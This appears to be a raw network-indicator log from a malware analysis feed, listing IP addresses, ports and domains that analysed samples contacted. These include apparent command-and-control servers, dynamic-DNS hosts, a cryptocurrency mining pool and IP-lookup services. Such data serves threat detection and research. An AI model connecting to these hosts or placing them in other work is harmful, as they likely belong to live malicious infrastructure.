| NL | 85.31.47.154:80 | win-network-checker.cc | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | cxlugg.sbs | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| KZ | 95.59.165.102:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | downsexv.com | udp |
| US | 172.67.189.30:80 | downsexv.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| RU | 45.90.34.133:443 | pb.agnt.ru | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| IR | 151.247.143.25:40500 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | up.maolaoban.top | udp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AO | 102.219.187.80:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 185.232.59.135:80 | up.maolaoban.top | tcp |
| US | 8.8.8.8:53 | lol.7hacks.click | udp |
| US | 198.54.115.219:443 | lol.7hacks.click | tcp |
| US | 8.8.8.8:53 | c1.5yyz.com | udp |
| CN | 123.184.58.35:80 | c1.5yyz.com | tcp |
| US | 8.8.8.8:53 | HITROL-60505.portmap.host | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.186.84.81:40500 | udp | |
| PL | 185.16.38.41:2034 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| RU | 31.23.95.118:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| PL | 185.16.38.41:2024 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 85.185.237.83:40500 | udp | |
| RU | 185.215.113.26:80 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | home.sevkk17pn.top | udp |
| US | 8.8.8.8:53 | c2.5yyz.com | udp |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| KZ | 178.91.130.114:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.176.119.113:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AO | 129.122.232.67:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | apps.game.qq.com | udp |
| HK | 43.129.139.164:80 | apps.game.qq.com | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 123.184.58.35:80 | c1.5yyz.com | tcp |
| KZ | 2.132.15.134:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| SY | 77.44.131.125:40500 | udp | |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| SY | 178.253.102.214:40500 | udp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 90.156.166.108:40500 | udp | |
| EG | 197.121.126.87:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 91.185.130.166:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| N/A | 127.0.0.1:51160 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | UmLcmUHSTT.UmLcmUHSTT | udp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| MX | 189.167.57.71:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| UZ | 185.203.237.215:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| RU | 194.87.248.37:1912 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.187.42.28:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| RU | 194.87.248.37:1912 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 90.156.160.6:40500 | tcp | |
| KZ | 31.169.15.229:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| IR | 2.189.31.47:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| US | 96.248.52.125:8031 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| KZ | 31.171.185.170:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| US | 8.8.8.8:53 | fender-shop.online | udp |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 46.248.37.226:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| MX | 189.150.7.25:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.59.171.222:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 212.120.203.199:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| IR | 2.177.150.123:40500 | udp | |
| RU | 185.215.113.67:27667 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| IR | 2.187.40.5:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| KZ | 178.90.200.255:40500 | tcp | |
| US | 198.163.193.223:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| AT | 77.73.131.68:6969 | tcp | |
| UZ | 90.156.161.82:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| UZ | 90.156.163.33:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 96.248.52.125:8031 | tcp | |
| UZ | 146.120.17.117:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 212.120.203.199:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.185.39.132:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.58.74.111:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| EG | 45.242.17.111:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 89.236.217.71:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | bitkiselurunsiparis.com | udp |
| TR | 94.73.144.130:443 | bitkiselurunsiparis.com | tcp |
| RU | 178.206.158.183:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 5.219.134.102:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 5.239.147.239:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| CN | 183.57.21.131:8095 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| YE | 134.35.158.149:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| N/A | 127.0.0.1:51989 | tcp | |
| N/A | 127.0.0.1:52000 | tcp | |
| N/A | 127.0.0.1:52009 | tcp | |
| N/A | 127.0.0.1:52011 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| UZ | 90.156.162.48:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 5.234.140.118:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| EG | 45.242.104.231:40500 | udp | |
| NL | 45.66.231.214:9932 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 123.60.37.61:9999 | tcp | |
| IR | 94.183.35.46:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 213.206.44.35:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 5.239.109.92:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | fieldtrollyeowskwe.shop | udp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AO | 154.71.253.54:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| KZ | 92.47.52.79:40500 | udp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 31.8.228.20:40500 | tcp | |
| UZ | 90.156.160.86:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| GB | 91.238.160.241:443 | jtpdev.co.uk | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | www.clubedasluluzinhasro.com.br | udp |
| US | 67.23.238.117:443 | www.clubedasluluzinhasro.com.br | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 90.156.166.42:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 95.29.145.167:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 96.248.52.125:8031 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 82.147.85.194:80 | tcp | |
| UZ | 89.236.218.158:40500 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| KZ | 88.204.241.182:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | tianyinsoft.top | udp |
| CN | 139.9.248.128:80 | tianyinsoft.top | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 78.81.147.173:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| TJ | 91.218.161.58:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 5.202.242.190:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| MX | 187.194.22.140:40500 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| RU | 5.139.95.144:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | blade-govern.sbs | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 8.8.8.8:53 | story-tense-faz.sbs | udp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| US | 8.8.8.8:53 | disobey-curly.sbs | udp |
| US | 8.8.8.8:53 | motion-treesz.sbs | udp |
| US | 8.8.8.8:53 | powerful-avoids.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 151.242.48.19:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 96.248.52.125:8031 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| YE | 46.35.80.190:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| BG | 146.70.53.161:40500 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | sirault.be | udp |
| BG | 195.230.23.72:80 | tcp | |
| FR | 185.98.131.200:443 | sirault.be | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| UZ | 90.156.162.5:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | HITROL-60505.portmap.host | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.80.134:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 188.124.116.191:40500 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| IR | 5.53.53.141:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 185.215.113.67:15206 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 96.248.52.125:8031 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 45.66.231.214:9932 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
